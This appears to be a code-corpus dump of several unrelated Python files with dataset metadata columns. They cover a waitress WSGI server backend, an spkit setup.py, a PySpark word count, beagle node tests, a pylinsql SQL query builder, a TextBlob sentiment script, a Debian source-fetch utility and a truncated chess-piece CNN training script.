from minipylib.server.backends.base import Server
try:
import waitress
class WaitressServer(Server):
"""
Waitress server.
Waitress is meant to be a production-quality pure-Python WSGI
server with very acceptable performance. It has no
dependencies except ones which live in the Python standard
library. It runs on CPython on Unix and Windows under Python
2.6+ and Python 3.2+. It is also known to run on PyPy 1.6.0 on
UNIX. It supports HTTP/1.0 and HTTP/1.1.
:source: https://waitress.readthedocs.org/
"""
name = 'waitress'
def run(self):
host, port = self.config.bind_addr
self.server = waitress.serve
try:
self.server(self.config.app, host=host, port=port)
except KeyboardInterrupt:
self.stop()
except ImportError:
pass
| # -*- coding: utf-8 -*-
"""
minipylib.server.backends.waitress_server
Define a wsgi server object based on waitress.
"""
# created: 2014-08-30 <NAME> <<EMAIL>>
# updated: 2014-08-30 kchan
from __future__ import (absolute_import, unicode_literals)
from minipylib.server.backends.base import Server
try:
import waitress
class WaitressServer(Server):
"""
Waitress server.
Waitress is meant to be a production-quality pure-Python WSGI
server with very acceptable performance. It has no
dependencies except ones which live in the Python standard
library. It runs on CPython on Unix and Windows under Python
2.6+ and Python 3.2+. It is also known to run on PyPy 1.6.0 on
UNIX. It supports HTTP/1.0 and HTTP/1.1.
:source: https://waitress.readthedocs.org/
"""
name = 'waitress'
def run(self):
host, port = self.config.bind_addr
self.server = waitress.serve
try:
self.server(self.config.app, host=host, port=port)
except KeyboardInterrupt:
self.stop()
except ImportError:
pass
| en | 0.819215 | # -*- coding: utf-8 -*- minipylib.server.backends.waitress_server Define a wsgi server object based on waitress. # created: 2014-08-30 <NAME> <<EMAIL>> # updated: 2014-08-30 kchan Waitress server. Waitress is meant to be a production-quality pure-Python WSGI server with very acceptable performance. It has no dependencies except ones which live in the Python standard library. It runs on CPython on Unix and Windows under Python 2.6+ and Python 3.2+. It is also known to run on PyPy 1.6.0 on UNIX. It supports HTTP/1.0 and HTTP/1.1. :source: https://waitress.readthedocs.org/ | 2.239484 | 2 |
setup.py | Nikeshbajaj/spk | 9 | 6614037 | import setuptools
import os
with open("README.md", "r") as fh:
long_description = fh.read()
top_dir, _ = os.path.split(os.path.abspath(__file__))
if os.path.isfile(os.path.join(top_dir, 'Version')):
with open(os.path.join(top_dir, 'Version')) as f:
version = f.readline().strip()
else:
import urllib
Vpath = 'https://raw.githubusercontent.com/Nikeshbajaj/spkit/master/Version'
version = urllib.request.urlopen(Vpath).read().strip().decode("utf-8")
setuptools.setup(
name="spkit",
version= version,
author="<NAME>",
author_email="<EMAIL>",
description="SpKit: Signal Processing toolkit | <NAME> |",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://spkit.github.io",
download_url = 'https://github.com/Nikeshbajaj/spkit/tarball/' + version,
packages=setuptools.find_packages(),
license = 'MIT',
keywords = 'Signal processing machine-learning entropy Rényi Kullback–Leibler divergence mutual information decision-tree logistic-regression naive-bayes LFSR ICA EEG-signal-processing ATAR',
classifiers=[
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Natural Language :: English',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
'Development Status :: 5 - Production/Stable',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Multimedia',
'Topic :: Multimedia :: Sound/Audio :: Analysis',
'Topic :: Multimedia :: Sound/Audio :: Speech',
'Topic :: Scientific/Engineering :: Image Processing',
'Topic :: Scientific/Engineering :: Visualization',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Intended Audience :: Education',
'Development Status :: 5 - Production/Stable',
],
project_urls={
'Documentation': 'https://spkit.readthedocs.io/',
'Say Thanks!': 'https://github.com/Nikeshbajaj',
'Source': 'https://github.com/Nikeshbajaj/spkit',
'Tracker': 'https://github.com/Nikeshbajaj/spkit/issues',
},
include_package_data=True,
install_requires=['numpy','matplotlib','scipy','scikit-learn','python-picard']
)
| import setuptools
import os
with open("README.md", "r") as fh:
long_description = fh.read()
top_dir, _ = os.path.split(os.path.abspath(__file__))
if os.path.isfile(os.path.join(top_dir, 'Version')):
with open(os.path.join(top_dir, 'Version')) as f:
version = f.readline().strip()
else:
import urllib
Vpath = 'https://raw.githubusercontent.com/Nikeshbajaj/spkit/master/Version'
version = urllib.request.urlopen(Vpath).read().strip().decode("utf-8")
setuptools.setup(
name="spkit",
version= version,
author="<NAME>",
author_email="<EMAIL>",
description="SpKit: Signal Processing toolkit | <NAME> |",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://spkit.github.io",
download_url = 'https://github.com/Nikeshbajaj/spkit/tarball/' + version,
packages=setuptools.find_packages(),
license = 'MIT',
keywords = 'Signal processing machine-learning entropy Rényi Kullback–Leibler divergence mutual information decision-tree logistic-regression naive-bayes LFSR ICA EEG-signal-processing ATAR',
classifiers=[
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Natural Language :: English',
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
'Development Status :: 5 - Production/Stable',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Multimedia',
'Topic :: Multimedia :: Sound/Audio :: Analysis',
'Topic :: Multimedia :: Sound/Audio :: Speech',
'Topic :: Scientific/Engineering :: Image Processing',
'Topic :: Scientific/Engineering :: Visualization',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Intended Audience :: Education',
'Development Status :: 5 - Production/Stable',
],
project_urls={
'Documentation': 'https://spkit.readthedocs.io/',
'Say Thanks!': 'https://github.com/Nikeshbajaj',
'Source': 'https://github.com/Nikeshbajaj/spkit',
'Tracker': 'https://github.com/Nikeshbajaj/spkit/issues',
},
include_package_data=True,
install_requires=['numpy','matplotlib','scipy','scikit-learn','python-picard']
)
| none | 1 | 1.433681 | 1 | |
MapReduce_Examples/WordCount_Spark/Run_Spark_for_WordCount.py | sammath/Coursera | 0 | 6614038 |
#----------------------------------------------
# This code is written in ipython pySpark shell
#-----------------------------------------------
# You can either read text into your Spark from local fileSystem:
mySample_text_RDD = sc.textFile("file///directory_to_your_sample_text")
# Or you can read from HDFS(dont forget to put your sample text into hdfs!)
mySample_text_RDD = sc.textFile("/directory_of_your_sample_text_in_HDFS/")
# You can see your first n line by the following command
mySample_text_RDD.take(n)
# Now mapper is as below:
def split_words(line):
return line.split()
def create_pair(word):
return (word, 1)
pairs_RDD = mySample_text_RDD.flatMap(split_words).map(create_pair)
# You can see your output by the following .collect() command
pairs_RDD.collect()
# Now Reducer is as short as follow:
def sum_counts(a,b):
return a+b
# Now run reducer
wordCounts_RDD = pairs_RDD.reduceByKey(sum_counts)
# Now lets se what we get as a result
wordCounts_RDD.collect()
|
#----------------------------------------------
# This code is written in ipython pySpark shell
#-----------------------------------------------
# You can either read text into your Spark from local fileSystem:
mySample_text_RDD = sc.textFile("file///directory_to_your_sample_text")
# Or you can read from HDFS(dont forget to put your sample text into hdfs!)
mySample_text_RDD = sc.textFile("/directory_of_your_sample_text_in_HDFS/")
# You can see your first n line by the following command
mySample_text_RDD.take(n)
# Now mapper is as below:
def split_words(line):
return line.split()
def create_pair(word):
return (word, 1)
pairs_RDD = mySample_text_RDD.flatMap(split_words).map(create_pair)
# You can see your output by the following .collect() command
pairs_RDD.collect()
# Now Reducer is as short as follow:
def sum_counts(a,b):
return a+b
# Now run reducer
wordCounts_RDD = pairs_RDD.reduceByKey(sum_counts)
# Now lets se what we get as a result
wordCounts_RDD.collect()
| en | 0.897025 | #---------------------------------------------- # This code is written in ipython pySpark shell #----------------------------------------------- # You can either read text into your Spark from local fileSystem: # Or you can read from HDFS(dont forget to put your sample text into hdfs!) # You can see your first n line by the following command # Now mapper is as below: # You can see your output by the following .collect() command # Now Reducer is as short as follow: # Now run reducer # Now lets se what we get as a result | 3.657421 | 4 |
tests/nodes/test_alert.py | limkokhian/beagle | 1,139 | 6614039 | from beagle.nodes import Alert, Domain
def test_create_alert():
    # Constructing an Alert should store both fields unchanged.
    created = Alert(alert_name="foo", alert_data={"time": "foo"})
    assert created.alert_name == "foo"
    assert created.alert_data == {"time": "foo"}
def test_alerted_on():
    # Linking a domain to an alert should record the timestamped edge.
    alert = Alert(alert_name="foo", alert_data={"time": "foo"})
    domain = Domain("foobar.com")
    alert.alerted_on[domain].append(timestamp=1234)
    assert {"timestamp": 1234} in alert.alerted_on[domain]
| from beagle.nodes import Alert, Domain
def test_create_alert():
alert = Alert(alert_name="foo", alert_data={"time": "foo"})
assert alert.alert_name == "foo"
assert alert.alert_data == {"time": "foo"}
def test_alerted_on():
alert = Alert(alert_name="foo", alert_data={"time": "foo"})
dom = Domain("foobar.com")
alert.alerted_on[dom].append(timestamp=1234)
assert {"timestamp": 1234} in alert.alerted_on[dom]
| none | 1 | 2.507783 | 3 | |
pylinsql/query.py | hunyadi/pylinsql | 0 | 6614040 | <filename>pylinsql/query.py
"""
Construct a SQL query from a Python expression.
"""
from __future__ import annotations
import functools
import inspect
import os.path
import sys
from dataclasses import dataclass
from types import CodeType
from typing import Generator, List, Type
from .base import DataClass, T
from .builder import Context, QueryBuilder, QueryBuilderArgs
from .core import EntityProxy, Query
from .decompiler import CodeExpression, CodeExpressionAnalyzer
def get_entity_types(sql_generator_expr: Generator) -> List[Type]:
    """Return the entity types referenced by a SQL generator expression."""
    if not inspect.isgenerator(sql_generator_expr):
        raise TypeError(
            f"expected a SQL generator expression but got: {type(sql_generator_expr)}"
        )
    # ".0" is CPython's internal name for a genexpr's source iterable.
    proxy = sql_generator_expr.gi_frame.f_locals[".0"]
    if not isinstance(proxy, EntityProxy):
        raise TypeError("invalid SQL generator expression")
    return proxy.types
@functools.lru_cache
def _analyze_expression(code_object: CodeType) -> CodeExpression:
code_analyzer = CodeExpressionAnalyzer(code_object)
try:
return code_analyzer.get_expression()
except Exception as e:
path = code_object.co_filename
lineno = code_object.co_firstlineno
raise RuntimeError(
f'error parsing expression in file "{path}", line {lineno}'
) from e
@dataclass
class CacheInfo:
    """Hit/miss statistics of the expression-analysis cache."""

    # number of lookups served directly from the cache
    hits: int
    # number of lookups that required a fresh analysis
    misses: int
def cache_info() -> CacheInfo:
    """Report hit/miss statistics of the expression-analysis cache."""
    stats = _analyze_expression.cache_info()
    return CacheInfo(hits=stats.hits, misses=stats.misses)
def _query_builder_args(sql_generator_expr: Generator) -> QueryBuilderArgs:
    """Assemble the QueryBuilderArgs for a SQL generator expression.

    Decompiles the generator's bytecode into an AST, locates the first
    stack frame outside this package (taken to be the caller whose local
    and global variables the query may reference), and bundles everything
    for QueryBuilder.

    :raises TypeError: if the argument is not a generator.
    """
    if not inspect.isgenerator(sql_generator_expr):
        raise TypeError(
            f"expected a SQL generator expression but got: {type(sql_generator_expr)}"
        )
    # obtain AST representation of generator expression (memoized per code object)
    code_expression = _analyze_expression(sql_generator_expr.gi_frame.f_code)
    # get reference to caller's frame: start two frames up (skipping the
    # public wrapper) and walk outward until we leave this package.
    # NOTE(review): _getframe(2) assumes exactly one wrapper between the
    # user and this helper -- confirm if call depth ever changes.
    package_root = os.path.dirname(__file__)
    caller = frame = sys._getframe(2)
    while frame:
        if not frame.f_code.co_filename.startswith(package_root):
            caller = frame
            break
        frame = frame.f_back
    # build query context from the expression's own locals plus the
    # caller's locals and globals
    context = Context(code_expression.local_vars, caller.f_locals, caller.f_globals)
    # ".0" is CPython's internal name for the genexpr's source iterable
    source_arg = sql_generator_expr.gi_frame.f_locals[".0"]
    # build SQL query argument bundle
    return QueryBuilderArgs(
        source_arg,
        context,
        code_expression.conditional_expr,
        code_expression.yield_expr,
    )
def select(sql_generator_expr: Generator[T, None, None]) -> Query[T]:
    "Builds a query expression corresponding to a SELECT SQL statement."
    args = _query_builder_args(sql_generator_expr)
    return QueryBuilder().select(args)
def insert_or_select(
    insert_obj: DataClass[T], sql_generator_expr: Generator[T, None, None]
) -> Query[T]:
    "Builds a query expression corresponding to a combined SELECT or INSERT SQL statement."
    args = _query_builder_args(sql_generator_expr)
    return QueryBuilder().insert_or_select(args, insert_obj)
| <filename>pylinsql/query.py
"""
Construct a SQL query from a Python expression.
"""
from __future__ import annotations
import functools
import inspect
import os.path
import sys
from dataclasses import dataclass
from types import CodeType
from typing import Generator, List, Type
from .base import DataClass, T
from .builder import Context, QueryBuilder, QueryBuilderArgs
from .core import EntityProxy, Query
from .decompiler import CodeExpression, CodeExpressionAnalyzer
def get_entity_types(sql_generator_expr: Generator) -> List[Type]:
if not inspect.isgenerator(sql_generator_expr):
raise TypeError(
f"expected a SQL generator expression but got: {type(sql_generator_expr)}"
)
entity = sql_generator_expr.gi_frame.f_locals[".0"]
if not isinstance(entity, EntityProxy):
raise TypeError("invalid SQL generator expression")
return entity.types
@functools.lru_cache
def _analyze_expression(code_object: CodeType) -> CodeExpression:
code_analyzer = CodeExpressionAnalyzer(code_object)
try:
return code_analyzer.get_expression()
except Exception as e:
path = code_object.co_filename
lineno = code_object.co_firstlineno
raise RuntimeError(
f'error parsing expression in file "{path}", line {lineno}'
) from e
@dataclass
class CacheInfo:
hits: int
misses: int
def cache_info() -> CacheInfo:
info = _analyze_expression.cache_info()
return CacheInfo(info.hits, info.misses)
def _query_builder_args(sql_generator_expr: Generator) -> QueryBuilderArgs:
if not inspect.isgenerator(sql_generator_expr):
raise TypeError(
f"expected a SQL generator expression but got: {type(sql_generator_expr)}"
)
# obtain AST representation of generator expression
code_expression = _analyze_expression(sql_generator_expr.gi_frame.f_code)
# get reference to caller's frame
package_root = os.path.dirname(__file__)
caller = frame = sys._getframe(2)
while frame:
if not frame.f_code.co_filename.startswith(package_root):
caller = frame
break
frame = frame.f_back
# build query context
context = Context(code_expression.local_vars, caller.f_locals, caller.f_globals)
source_arg = sql_generator_expr.gi_frame.f_locals[".0"]
# build SQL query
return QueryBuilderArgs(
source_arg,
context,
code_expression.conditional_expr,
code_expression.yield_expr,
)
def select(sql_generator_expr: Generator[T, None, None]) -> Query[T]:
"Builds a query expression corresponding to a SELECT SQL statement."
qba = _query_builder_args(sql_generator_expr)
builder = QueryBuilder()
return builder.select(qba)
def insert_or_select(
insert_obj: DataClass[T], sql_generator_expr: Generator[T, None, None]
) -> Query[T]:
"Builds a query expression corresponding to a combined SELECT or INSERT SQL statement."
qba = _query_builder_args(sql_generator_expr)
builder = QueryBuilder()
return builder.insert_or_select(qba, insert_obj)
| en | 0.741575 | Construct a SQL query from a Python expression. # obtain AST representation of generator expression # get reference to caller's frame # build query context # build SQL query | 2.431901 | 2 |
Analysis.py | JamesScharf/StockTwinVisualizer | 1 | 6614041 | import Scraper
import pickle
from textblob import TextBlob
def sentiments(corpus):
    '''
    Score every document in *corpus* with TextBlob.

    Returns two parallel lists, one entry per document: polarity (how
    positive/negative it is) and subjectivity (how biased it is).
    No averaging (mean/median/mode) is performed.
    '''
    scored = [TextBlob(doc).sentiment for doc in corpus]
    polarity = [s.polarity for s in scored]
    subjectivity = [s.subjectivity for s in scored]
    return polarity, subjectivity
def sentimentTitles(oneStock):
    """Sentiment scores for a stock's news-article titles."""
    return sentiments(oneStock.titles)
def sentimentSummaries(oneStock):
    """Sentiment scores for a stock's news-article summaries."""
    return sentiments(oneStock.summaries)
def sentimentNewsText(oneStock):
    """Sentiment scores for a stock's full news-article texts."""
    return sentiments(oneStock.texts)
def sentimentWikiReferences(oneStock):
    """Sentiment scores for a stock's Wikipedia references."""
    return sentiments(oneStock.wikiReferences)
def sentimentWikiLinks(oneStock):
    """Sentiment scores for a stock's Wikipedia links.

    Fixed: previously read ``oneStock.sentimentWikiLinks`` -- an attribute
    named after this function itself, unlike every sibling accessor which
    reads a plain data attribute (titles, summaries, wikiReferences, ...).
    That looks like a copy-paste slip and would raise AttributeError.
    """
    corpus = oneStock.wikiLinks
    return sentiments(corpus)
def sentimentWikiSummary(oneStock):
    """Sentiment scores for a stock's Wikipedia summary (list of sections)."""
    return sentiments(oneStock.wikiSummary)
def sentimentWikiContent(oneStock):
    """Sentiment scores for a stock's Wikipedia page, scored as one document."""
    single_doc_corpus = [oneStock.wikiContent]
    return sentiments(single_doc_corpus)
def articleSentiments(stockList):
    '''
    Collect per-article sentiment series for each stock.

    Returns four parallel lists (one entry per stock): title polarities,
    title subjectivities, article-text polarities and article-text
    subjectivities; each entry is itself a list over that stock's articles.

    NOTE(review): the original docstring said the series are "sometimes
    reversed" and need correcting, but no reversal is performed below --
    confirm whether callers expect chronological order.
    '''
    # lists of per-stock lists ("arrays of arrays")
    titlePolarities = []
    titleBias = []
    textPolarities = []
    textBias = []
    for oneStock in stockList:
        titlePolarity, titleSubj = sentimentTitles(oneStock)
        titlePolarities.append(titlePolarity)
        titleBias.append(titleSubj)
        textPolarity, textSubj = sentimentNewsText(oneStock)
        textPolarities.append(textPolarity)
        textBias.append(textSubj)
    return titlePolarities, titleBias, textPolarities, textBias
import pickle
from textblob import TextBlob
def sentiments(corpus):
'''
Get average sentiment of a list of strings, or "documents"
Returns list of polarity (how positive/negative it is)
and subjectivity (how biased it is)
DOES NOT CALCULATE AVERAGE/MEDIAN/MODE
'''
polarity = []
subjectivity = []
for doc in corpus:
docBlob = TextBlob(doc)
polarity.append(docBlob.sentiment.polarity)
subjectivity.append(docBlob.sentiment.subjectivity)
return polarity, subjectivity
def sentimentTitles(oneStock):
corpus = oneStock.titles
return sentiments(corpus)
def sentimentSummaries(oneStock):
corpus = oneStock.summaries
return sentiments(corpus)
def sentimentNewsText(oneStock):
corpus = oneStock.texts
return sentiments(corpus)
def sentimentWikiReferences(oneStock):
corpus = oneStock.wikiReferences
return sentiments(corpus)
def sentimentWikiLinks(oneStock):
corpus = oneStock.sentimentWikiLinks
return sentiments(corpus)
def sentimentWikiSummary(oneStock):
corpus = oneStock.wikiSummary
return sentiments(corpus)
def sentimentWikiContent(oneStock):
corpus = [oneStock.wikiContent]
return sentiments(corpus)
def articleSentiments(stockList):
'''
The sentiment values come in an array over time
Sometimes they're reversed, so we need to reverse them to correct
'''
#arrays of arrays
titlePolarities = []
titleBias = []
textPolarities = []
textBias = []
for oneStock in stockList:
titlePolarity, titleSubj = sentimentTitles(oneStock)
titlePolarities.append(titlePolarity)
titleBias.append(titleSubj)
textPolarity, textSubj = sentimentNewsText(oneStock)
textPolarities.append(textPolarity)
textBias.append(textSubj)
return titlePolarities, titleBias, textPolarities, textBias | en | 0.776762 | Get average sentiment of a list of strings, or "documents"
Returns list of polarity (how positive/negative it is)
and subjectivity (how biased it is)
DOES NOT CALCULATE AVERAGE/MEDIAN/MODE The sentiment values come in an array over time
Sometimes they're reversed, so we need to reverse them to correct #arrays of arrays | 2.80875 | 3 |
debile/utils/aget.py | LeoCavaille/debile | 0 | 6614042 | <filename>debile/utils/aget.py
# Copyright (c) 2012-2013 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from debile.utils import run_command
import deb822
import StringIO
import requests
import gzip
import os
# Relative path of the Sources index inside a Debian archive.
SOURCE = "dists/{suite}/{section}/source/Sources.gz"
def dget(path):
    """Download a Debian source package with ``dget -u``.

    Raises Exception (with dget's exit code and stderr) on failure,
    instead of printing to stdout and raising an uninformative message.
    """
    out, err, ret = run_command(["dget", "-u", path])
    if ret != 0:
        raise Exception("dget failed with exit code %d: %s" % (ret, err))
def aget(archive, suite, section, source, version):
    """Fetch the .dsc of *source*/*version* from *archive*; return its basename.

    Downloads and parses the suite's Sources.gz index, locates the entry
    matching the requested source package and version, and dget's its
    .dsc file.

    Raises Exception if the package is not found, or if the matching
    entry lists no .dsc file (previously this crashed inside
    os.path.basename(None)).
    """
    url = "{archive}/{path}".format(
        archive=archive,
        path=SOURCE.format(suite=suite, section=section
        ))

    for entry in deb822.Deb822.iter_paragraphs(gzip.GzipFile(
            fileobj=StringIO.StringIO(requests.get(url).content))):
        path = entry['Directory']

        # Find the .dsc file listed for this source package entry.
        dsc = None
        for fp in entry['Files'].splitlines():
            if fp.strip() == "":
                continue
            hash_, size, fid = fp.split()
            if fid.endswith(".dsc"):
                dsc = fid

        if entry['Package'] == source and entry['Version'] == version:
            if dsc is None:
                raise Exception(
                    "no .dsc file listed for %s %s" % (source, version))
            dget("{archive}/{pool}/{dsc}".format(
                archive=archive,
                pool=path,
                dsc=dsc,
            ))
            return os.path.basename(dsc)

    # Replaces the old for/else branch that printed "BALLS." and raised
    # a bare Exception with no context.
    raise Exception("package %s version %s not found in %s" % (
        source, version, url))
def main():
    """Command-line entry point: forward positional arguments to aget()."""
    import sys
    command_line_args = sys.argv[1:]
    return aget(*command_line_args)
| <filename>debile/utils/aget.py
# Copyright (c) 2012-2013 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from debile.utils import run_command
import deb822
import StringIO
import requests
import gzip
import os
SOURCE = "dists/{suite}/{section}/source/Sources.gz"
def dget(path):
out, err, ret = run_command(["dget", "-u", path])
if ret != 0:
print ret, err
raise Exception("DAMNIT; dget fucked us")
def aget(archive, suite, section, source, version):
url = "{archive}/{path}".format(
archive=archive,
path=SOURCE.format(suite=suite, section=section
))
for entry in deb822.Deb822.iter_paragraphs(gzip.GzipFile(
fileobj=StringIO.StringIO(requests.get(url).content))):
path = entry['Directory']
dsc = None
for fp in entry['Files'].splitlines():
if fp.strip() == "":
continue
hash_, size, fid = fp.split()
if fid.endswith(".dsc"):
dsc = fid
if entry['Package'] == source and entry['Version'] == version:
dget("{archive}/{pool}/{dsc}".format(
archive=archive,
pool=path,
dsc=dsc,
))
# break
return os.path.basename(dsc)
else:
print "BALLS."
raise Exception
def main():
import sys
return aget(*sys.argv[1:])
| en | 0.754242 | # Copyright (c) 2012-2013 <NAME> <<EMAIL>> # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. # break | 2.05166 | 2 |
baseline.py | Rjuhl/Chessposition-recognition | 0 | 6614043 | import numpy as np
import os
import torch
import torch.nn as nn
from torchvision import transforms
from torch.utils.data import Dataset, DataLoader
import math
from PIL import Image
from torchsummary import summary
from numpy import asarray
# Root directory holding one sub-directory of tile images per piece class.
image_dir = "/content/Images"
# Output directory for the trained weights and accuracy CSVs.
SAVE_DIR = "/content/Results"
# Maps a piece-class directory name (e.g. "BB") to its absolute path;
# populated by popPeiceDir() below.
piece_dir = {}
batch_size = 128
image_size = (128, 128) # target (H, W) of each resized tile; subject to change
# Number of training epochs.
epochs = 50
def popPeiceDir():
    """Populate the module-level piece_dir map from image_dir's sub-directories,
    skipping hidden entries.  (The "Peice" spelling is kept for
    backward compatibility with existing callers.)
    """
    for entry in os.listdir(image_dir):
        # Renamed from 'dir', which shadowed the built-in dir().
        if entry.startswith('.'):
            continue
        piece_dir[entry] = os.path.join(image_dir, entry)

popPeiceDir()
# Empty Square = 0, Pawn = 1, King = 2, Queen = 3, Rook = 4, Bishop = 5, Knight = 6
def getFilesAndLabels():
    """Return [image_path, class_label] pairs for every training image.

    Labels: empty=0, pawn=1, king=2, queen=3, rook=4, bishop=5, knight=6.
    Test-image directories are excluded; hidden files are skipped.
    """
    # Directory name -> class label (black and white pieces share a label).
    label_by_dir = {
        "BB": 5, "WB": 5,
        "BK": 6, "WK": 6,
        "BKi": 2, "WKi": 2,
        "BP": 1, "WP": 1,
        "BQ": 3, "WQ": 3,
        "BR": 4, "WR": 4,
        "Empty": 0,
    }
    samples = []
    for key in piece_dir:
        if key == "Testimg" or key == "Testimg2":
            continue
        label = label_by_dir.get(key, -1)
        for fname in os.listdir(piece_dir[key]):
            if fname.startswith('.'):
                continue
            assert label != -1
            samples.append([os.path.join(piece_dir[key], fname), label])
    return samples
def transformImg(img):
    """Grayscale, resize to image_size, convert to tensor, normalize to [-1, 1]."""
    steps = [
        transforms.Grayscale(),
        transforms.Resize(image_size),
        transforms.ToTensor(),
        transforms.Normalize((0.5), (0.5)),
    ]
    return transforms.Compose(steps)(img)
def getArr(image_path):
    """Load the image at *image_path* and return it as a preprocessed tensor."""
    return transformImg(Image.open(image_path))
class DataSet(Dataset):
    """Dataset of (image tensor, class label) pairs.

    *files_labels* is a list of [image_path, label] pairs, as produced
    by getFilesAndLabels().  Images are loaded lazily in __getitem__.
    """

    def __init__(self, files_labels):
        self.fl = files_labels
        # Retained for interface compatibility; not used internally.
        self.count = 0

    def __len__(self):
        return len(self.fl)

    def __getitem__(self, index):
        # Load and preprocess the image on demand.  (The commented-out
        # one-hot encoding that used to live here has been removed:
        # CrossEntropyLoss expects integer class indices.)
        img_arr = getArr(self.fl[index][0])
        label = self.fl[index][1]
        return img_arr.float(), label
# Starting Image dims, Maxpooling Kernal, number of times maxpool is called in CNN, number of conv channels
def findFCFeatures(images_size, maxpooling, num_maxpool, num_channels):
    """Number of features entering the fully-connected layer.

    Applies the max-pool output-size formula (stride == kernel size, no
    padding) *num_maxpool* times to both spatial dimensions, then
    multiplies by the channel count.
    """
    width, height = images_size
    kw, kh = maxpooling
    for _ in range(num_maxpool):
        width = (width - kw) // kw + 1
        height = (height - kh) // kh + 1
    return width * height * num_channels
def double_conv(in_channels, out_channels):
    """Two 3x3 same-padding convolutions, each followed by LeakyReLU."""
    layers = [
        nn.Conv2d(in_channels, out_channels, 3, padding=1),
        nn.LeakyReLU(inplace=True),
        nn.Conv2d(out_channels, out_channels, 3, padding=1),
        nn.LeakyReLU(inplace=True),
    ]
    return nn.Sequential(*layers)
class Net(nn.Module):
    """CNN classifier mapping a 1-channel image of `image_size` to 7 class logits."""
    def __init__(self):
        super(Net, self).__init__()
        # Four double-conv stages with widening channels: 1->32->64->128->256.
        self.conv_down1 = double_conv(1, 32)
        self.conv_down2 = double_conv(32, 64)
        self.conv_down3 = double_conv(64, 128)
        self.conv_down4 = double_conv(128, 256)
        self.maxpool = nn.MaxPool2d((2, 2))
        # Classifier head: input size is the spatial extent after three
        # 2x2 max-pools, times 256 channels; 7 outputs (empty + 6 pieces).
        self.fc1 = nn.Linear(findFCFeatures(image_size, (2, 2), 3, 256), 7)
    def forward(self, x):
        # Down-sampling path: conv stage followed by 2x2 max-pool, three times.
        conv1 = self.conv_down1(x)
        x = self.maxpool(conv1)
        conv2 = self.conv_down2(x)
        x = self.maxpool(conv2)
        conv3 = self.conv_down3(x)
        x = self.maxpool(conv3)
        # Final conv stage without pooling.
        x = self.conv_down4(x)
        # Flatten to (batch, features) for the fully-connected head.
        x = x.view(-1, findFCFeatures(image_size, (2, 2), 3, 256))
        x = self.fc1(x)
        return x
def train(GPU=True):
    """Train the Net tile classifier and save weights + accuracy curves.

    Performs an 80/20 train/test split, trains with Adam + cross-entropy
    for `epochs` epochs, records per-batch losses and per-epoch accuracy,
    and writes the model weights and accuracy CSVs under SAVE_DIR.

    Args:
